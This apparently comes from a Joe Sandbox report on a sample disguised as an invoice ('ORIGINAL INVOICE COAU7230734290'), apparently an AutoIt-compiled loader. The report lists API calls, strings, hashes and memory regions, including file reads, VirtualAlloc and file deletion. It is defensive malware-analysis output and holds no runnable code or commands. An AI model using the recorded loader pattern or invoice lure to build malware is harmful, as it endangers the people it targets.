                                                              • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                              • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                              • API String ID: 2641332412-570651680
                                                              • Opcode ID: 95e9ef8691173ebb9be18e78cd420f64627f429aefeff0e2261656973605d828
                                                              • Instruction ID: e451b90d9de14af4e24bc3b31d99d7e6ece9ef3c49e6a29fe13f89e9b4552a73
                                                              • Opcode Fuzzy Hash: 95e9ef8691173ebb9be18e78cd420f64627f429aefeff0e2261656973605d828
                                                              • Instruction Fuzzy Hash: 91620770114345DFDB24DF24D899BBA77E4BF44304F18496DFA8A8B2A2DB70D898CB52
                                                              APIs
                                                              • ___createFile.LIBCMT ref: 00225EC3
                                                              • ___createFile.LIBCMT ref: 00225F04
                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00225F2D
                                                              • __dosmaperr.LIBCMT ref: 00225F34
                                                              • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00225F47
                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00225F6A
                                                              • __dosmaperr.LIBCMT ref: 00225F73
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00225F7C
                                                              • __set_osfhnd.LIBCMT ref: 00225FAC
                                                              • __lseeki64_nolock.LIBCMT ref: 00226016
                                                              • __close_nolock.LIBCMT ref: 0022603C
                                                              • __chsize_nolock.LIBCMT ref: 0022606C
                                                              • __lseeki64_nolock.LIBCMT ref: 0022607E
                                                              • __lseeki64_nolock.LIBCMT ref: 00226176
                                                              • __lseeki64_nolock.LIBCMT ref: 0022618B
                                                              • __close_nolock.LIBCMT ref: 002261EB
                                                                • Part of subcall function 0021EA9C: CloseHandle.KERNELBASE(00000000,0029EEF4,00000000,?,00226041,0029EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0021EAEC
                                                                • Part of subcall function 0021EA9C: GetLastError.KERNEL32(?,00226041,0029EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0021EAF6
                                                                • Part of subcall function 0021EA9C: __free_osfhnd.LIBCMT ref: 0021EB03
                                                                • Part of subcall function 0021EA9C: __dosmaperr.LIBCMT ref: 0021EB25
                                                                • Part of subcall function 00217C0E: __getptd_noexit.LIBCMT ref: 00217C0E
                                                              • __lseeki64_nolock.LIBCMT ref: 0022620D
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00226342
                                                              • ___createFile.LIBCMT ref: 00226361
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0022636E
                                                              • __dosmaperr.LIBCMT ref: 00226375
                                                              • __free_osfhnd.LIBCMT ref: 00226395
                                                              • __invoke_watson.LIBCMT ref: 002263C3
                                                              • __wsopen_helper.LIBCMT ref: 002263DD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                              • String ID: @
                                                              • API String ID: 3896587723-2766056989
                                                              • Opcode ID: 190421224dab8220db7cf3df2da40506a579db094b75f3671bf2eb24bc55ae0b
                                                              • Instruction ID: 7438384509d9accc7b85963b58fb53a25cb1b68ee924b8d5426d060cb9ab4891
                                                              • Opcode Fuzzy Hash: 190421224dab8220db7cf3df2da40506a579db094b75f3671bf2eb24bc55ae0b
                                                              • Instruction Fuzzy Hash: BB224872920527BBEB259FA8EC497FD7B71EB10314F248229E8119B2D1C7758DB0CB51

                                                              Control-flow Graph

                                                              APIs
                                                              • _wcscpy.LIBCMT ref: 0023FA96
                                                              • _wcschr.LIBCMT ref: 0023FAA4
                                                              • _wcscpy.LIBCMT ref: 0023FABB
                                                              • _wcscat.LIBCMT ref: 0023FACA
                                                              • _wcscat.LIBCMT ref: 0023FAE8
                                                              • _wcscpy.LIBCMT ref: 0023FB09
                                                              • __wsplitpath.LIBCMT ref: 0023FBE6
                                                              • _wcscpy.LIBCMT ref: 0023FC0B
                                                              • _wcscpy.LIBCMT ref: 0023FC1D
                                                              • _wcscpy.LIBCMT ref: 0023FC32
                                                              • _wcscat.LIBCMT ref: 0023FC47
                                                              • _wcscat.LIBCMT ref: 0023FC59
                                                              • _wcscat.LIBCMT ref: 0023FC6E
                                                                • Part of subcall function 0023BFA4: _wcscmp.LIBCMT ref: 0023C03E
                                                                • Part of subcall function 0023BFA4: __wsplitpath.LIBCMT ref: 0023C083
                                                                • Part of subcall function 0023BFA4: _wcscpy.LIBCMT ref: 0023C096
                                                                • Part of subcall function 0023BFA4: _wcscat.LIBCMT ref: 0023C0A9
                                                                • Part of subcall function 0023BFA4: __wsplitpath.LIBCMT ref: 0023C0CE
                                                                • Part of subcall function 0023BFA4: _wcscat.LIBCMT ref: 0023C0E4
                                                                • Part of subcall function 0023BFA4: _wcscat.LIBCMT ref: 0023C0F7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                              • String ID: >>>AUTOIT SCRIPT<<<$t2*
                                                              • API String ID: 2955681530-1473486655
                                                              • Opcode ID: eab3368aa20394b6ee9fa40dc6853329cd4732f03bb71d7805258f076b7e1e4c
                                                              • Instruction ID: 287ff43d8d1f564108b3cea2385299f41f2886726de21cc593a9b7a7b386fab0
                                                              • Opcode Fuzzy Hash: eab3368aa20394b6ee9fa40dc6853329cd4732f03bb71d7805258f076b7e1e4c
                                                              • Instruction Fuzzy Hash: 0391C4B1514305AFCB10EF50D981F9BB3E8BF98300F004829F95997292DB30EAA4CF91

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0023BDB4: __time64.LIBCMT ref: 0023BDBE
                                                                • Part of subcall function 001F4517: _fseek.LIBCMT ref: 001F452F
                                                              • __wsplitpath.LIBCMT ref: 0023C083
                                                                • Part of subcall function 00211DFC: __wsplitpath_helper.LIBCMT ref: 00211E3C
                                                              • _wcscpy.LIBCMT ref: 0023C096
                                                              • _wcscat.LIBCMT ref: 0023C0A9
                                                              • __wsplitpath.LIBCMT ref: 0023C0CE
                                                              • _wcscat.LIBCMT ref: 0023C0E4
                                                              • _wcscat.LIBCMT ref: 0023C0F7
                                                              • _wcscmp.LIBCMT ref: 0023C03E
                                                                • Part of subcall function 0023C56D: _wcscmp.LIBCMT ref: 0023C65D
                                                                • Part of subcall function 0023C56D: _wcscmp.LIBCMT ref: 0023C670
                                                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0023C2A1
                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0023C338
                                                              • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0023C34E
                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0023C35F
                                                              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0023C371
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                              • String ID: p1#v`K$v
                                                              • API String ID: 2378138488-1068180069
                                                              • Opcode ID: 6394e4084e1267b9d872b7622f6f0b5d658b2342725343dcb8753e01b885c417
                                                              • Instruction ID: 371458bd82468567bb1d7391324e3b0b58bce8422c735d69883fad88ac89733e
                                                              • Opcode Fuzzy Hash: 6394e4084e1267b9d872b7622f6f0b5d658b2342725343dcb8753e01b885c417
                                                              • Instruction Fuzzy Hash: BCC149B1A10219ABDF21DF95CC81EEEB7BDAF59300F1040AAF609F7151DB709A948F61

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSysColorBrush.USER32(0000000F), ref: 001F3F86
                                                              • RegisterClassExW.USER32(00000030), ref: 001F3FB0
                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001F3FC1
                                                              • InitCommonControlsEx.COMCTL32(?), ref: 001F3FDE
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001F3FEE
                                                              • LoadIconW.USER32(000000A9), ref: 001F4004
                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001F4013
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                              • API String ID: 2914291525-1005189915
                                                              • Opcode ID: 5a6352e2d67ae4e363c86791144b89dd3ec3671d857402c76093079254822333
                                                              • Instruction ID: 95a0e144cb7952ed068f92b78fdfe4b7dcf3ed7a33adf118d7c53846a0ce0dd4
                                                              • Opcode Fuzzy Hash: 5a6352e2d67ae4e363c86791144b89dd3ec3671d857402c76093079254822333
                                                              • Instruction Fuzzy Hash: 7C21E0B5900308AFDB00DFA5F88DBCEBBB8FB08700F50421AFA15A62A0D7B105948F91

                                                              Control-flow Graph

                                                              APIs
                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 001F37B3
                                                              • KillTimer.USER32(?,00000001), ref: 001F37DD
                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 001F3800
                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001F380B
                                                              • CreatePopupMenu.USER32 ref: 001F381F
                                                              • PostQuitMessage.USER32(00000000), ref: 001F382E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                              • String ID: TaskbarCreated
                                                              • API String ID: 129472671-2362178303
                                                              • Opcode ID: 9667839e79b6d29c62357ff97402f8bb2ae4bdcaa37ae4ed938a1322d35a0a79
                                                              • Instruction ID: 383c6cb51b8220c072577bd5ac51b0af4ef52814d526ad59a0cc43e99aa8860f
                                                              • Opcode Fuzzy Hash: 9667839e79b6d29c62357ff97402f8bb2ae4bdcaa37ae4ed938a1322d35a0a79
                                                              • Instruction Fuzzy Hash: 164127F112424EA7DB187F78FC5EBBA3669FB00340F540715FB26921A1CB60ADB197A1

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSysColorBrush.USER32(0000000F), ref: 001F3E79
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 001F3E88
                                                              • LoadIconW.USER32(00000063), ref: 001F3E9E
                                                              • LoadIconW.USER32(000000A4), ref: 001F3EB0
                                                              • LoadIconW.USER32(000000A2), ref: 001F3EC2
                                                                • Part of subcall function 001F4024: LoadImageW.USER32(001F0000,00000063,00000001,00000010,00000010,00000000), ref: 001F4048
                                                              • RegisterClassExW.USER32(?), ref: 001F3F30
                                                                • Part of subcall function 001F3F53: GetSysColorBrush.USER32(0000000F), ref: 001F3F86
                                                                • Part of subcall function 001F3F53: RegisterClassExW.USER32(00000030), ref: 001F3FB0
                                                                • Part of subcall function 001F3F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001F3FC1
                                                                • Part of subcall function 001F3F53: InitCommonControlsEx.COMCTL32(?), ref: 001F3FDE
                                                                • Part of subcall function 001F3F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001F3FEE
                                                                • Part of subcall function 001F3F53: LoadIconW.USER32(000000A9), ref: 001F4004
                                                                • Part of subcall function 001F3F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001F4013
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                              • String ID: #$0$AutoIt v3
                                                              • API String ID: 423443420-4155596026
                                                              • Opcode ID: 69c4f11fa3b400c08b933a799bf94b3bb6d304734750337861e1655df906b4a9
                                                              • Instruction ID: 5de01c80c7beb2b8e37699e232cd27d91a942f89af4387c0bed990dee79f10bc
                                                              • Opcode Fuzzy Hash: 69c4f11fa3b400c08b933a799bf94b3bb6d304734750337861e1655df906b4a9
                                                              • Instruction Fuzzy Hash: CE2162B0D14304ABCB04DFA9FC5EA9ABFF5FB48310F50461AE618A32A0D77146A48F91

                                                              Control-flow Graph
                                                              • Graph image not on page. Basic blocks e27128-e2742a; calls shown on the graph: e24b48, e28038, CreateFileW, VirtualAlloc, ReadFile, e28288, e28098, CloseHandle, VirtualFree
                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00E271F9
                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E2741F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2166684470.0000000000E24000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E24000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e24000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CreateFileFreeVirtual
                                                              • String ID:
                                                              • API String ID: 204039940-0
                                                              • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                              • Instruction ID: 40a136a7e00d9ff7da8906d6ab06d6a8c3b21775052063196305f6e94d4cd9aa
                                                              • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                              • Instruction Fuzzy Hash: 9DA13671E04229EBDB14CFA4D898BEEBBB5FF48304F209159E541BB280D7759A80DF64

                                                              Control-flow Graph
                                                              • Graph image not on page. Basic blocks 1f49fb-1f4a2f and 2641cc-26424f; calls shown on the graph: 1fbcce, RegOpenKeyExW, RegQueryValueExW, 20f4ea, 1f47b7, 1f6a63, 1f47e2, RegCloseKey
                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 001F4A1D
                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 002641DB
                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0026421A
                                                              • RegCloseKey.ADVAPI32(?), ref: 00264249
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: QueryValue$CloseOpen
                                                              • String ID: Include$Software\AutoIt v3\AutoIt
                                                              • API String ID: 1586453840-614718249
                                                              • Opcode ID: 5fd2faadc6b66e0f0777305a676766c64e045679c2291d918e77fd5f87dc603e
                                                              • Instruction ID: edb3e14727b78570a6c4ad6b840c4b246a47f80dba0c18ecc7e2cf7ecaf5d6ec
                                                              • Opcode Fuzzy Hash: 5fd2faadc6b66e0f0777305a676766c64e045679c2291d918e77fd5f87dc603e
                                                              • Instruction Fuzzy Hash: 4A119D75611109BFEB00ABA4DD86EBF7BBCEF15344F000059B606E2091EB70AE419B10

                                                              Control-flow Graph
                                                              • Graph image not on page. Single basic block 1f36b8-1f3728; calls shown on the graph: CreateWindowExW (2x), ShowWindow (2x)
                                                              APIs
                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001F36E6
                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 001F3707
                                                              • ShowWindow.USER32(00000000,?,?,?,?,001F3AA3,?), ref: 001F371B
                                                              • ShowWindow.USER32(00000000,?,?,?,?,001F3AA3,?), ref: 001F3724
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Window$CreateShow
                                                              • String ID: AutoIt v3$edit
                                                              • API String ID: 1584632944-3779509399
                                                              • Opcode ID: ff7eb7a5a8d3cb9a0a13eece32af293d51ca352eaed5593354ac9da7e70f0935
                                                              • Instruction ID: 9684548a076449102d6f6da764daefb8d73f1652df77ac9b6610426dc1c49732
                                                              • Opcode Fuzzy Hash: ff7eb7a5a8d3cb9a0a13eece32af293d51ca352eaed5593354ac9da7e70f0935
                                                              • Instruction Fuzzy Hash: 53F03A759542D07AE7306757BC1CE672E7DD7C6F20B60051ABE08A21A0C16108A5CAB0

                                                              Control-flow Graph
                                                              • Graph image not on page. Basic blocks e26ef8-e270dd; calls shown on the graph: e24b48, e26de8, CreateFileW, VirtualAlloc, ReadFile, e26e28, e25de8, e26e78, ExitProcess
                                                              APIs
                                                                • Part of subcall function 00E26DE8: Sleep.KERNELBASE(000001F4), ref: 00E26DF9
                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E27017
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2166684470.0000000000E24000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E24000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e24000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CreateFileSleep
                                                              • String ID: Z1TG6AXIQPLM9MRCBKRW
                                                              • API String ID: 2694422964-3614165976
                                                              • Opcode ID: 45f7b41b69cbcdecfed6337bc8d34a21b36d92e4db5e6852644cee32ed22db90
                                                              • Instruction ID: 0b9478215243eee5ef11507d410dad84d47d5c2f6abe77c9f0d915bb3c65b5ac
                                                              • Opcode Fuzzy Hash: 45f7b41b69cbcdecfed6337bc8d34a21b36d92e4db5e6852644cee32ed22db90
                                                              • Instruction Fuzzy Hash: 1E51BF31D04298EAEF11DBA4D805BEFBBB5AF19304F004199E658BB2C1D7B90B48CB65

                                                              APIs
                                                                • Part of subcall function 001F5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,002B1148,?,001F61FF,?,00000000,00000001,00000000), ref: 001F5392
                                                                • Part of subcall function 001F49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 001F4A1D
                                                              • _wcscat.LIBCMT ref: 00262D80
                                                              • _wcscat.LIBCMT ref: 00262DB5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: _wcscat$FileModuleNameOpen
                                                              • String ID: 8!+$\$\Include\
                                                              • API String ID: 3592542968-1039336780
                                                              • Opcode ID: e77c3ae3efd7b09de3945ee300e6c9b1c2e1da7443b11194b27089b3bb27b58a
                                                              • Instruction ID: cf7c566e1fc4bb63f484c0f50c50b945af987eab06a4995be3de8b4074883541
                                                              • Opcode Fuzzy Hash: e77c3ae3efd7b09de3945ee300e6c9b1c2e1da7443b11194b27089b3bb27b58a
                                                              • Instruction Fuzzy Hash: 7C516375424344DBC714EF59F9858AAB7F8FF69300B404A2EF648932A2DB70994CCF52
                                                              APIs
                                                              • _memset.LIBCMT ref: 001F522F
                                                              • _wcscpy.LIBCMT ref: 001F5283
                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 001F5293
                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00263CB0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                              • String ID: Line:
                                                              • API String ID: 1053898822-1585850449
                                                              • Opcode ID: 684b5533057940621dadaabb2e6661be0a397f998a100f6d8e776c37e0291116
                                                              • Instruction ID: d746240b7acb5c6d67b92aba8e4a65f8dc4fd918c8ef56bbffef085d05205f01
                                                              • Opcode Fuzzy Hash: 684b5533057940621dadaabb2e6661be0a397f998a100f6d8e776c37e0291116
                                                              • Instruction Fuzzy Hash: A031C171108748AFD324EB60EC46FEF77D8AF54340F404A1AF78992091EB70A698CB96
                                                              APIs
                                                                • Part of subcall function 001F41A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,001F39FE,?,00000001), ref: 001F41DB
                                                              • _free.LIBCMT ref: 002636B7
                                                              • _free.LIBCMT ref: 002636FE
                                                                • Part of subcall function 001FC833: __wsplitpath.LIBCMT ref: 001FC93E
                                                                • Part of subcall function 001FC833: _wcscpy.LIBCMT ref: 001FC953
                                                                • Part of subcall function 001FC833: _wcscat.LIBCMT ref: 001FC968
                                                                • Part of subcall function 001FC833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 001FC978
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                              • API String ID: 805182592-1757145024
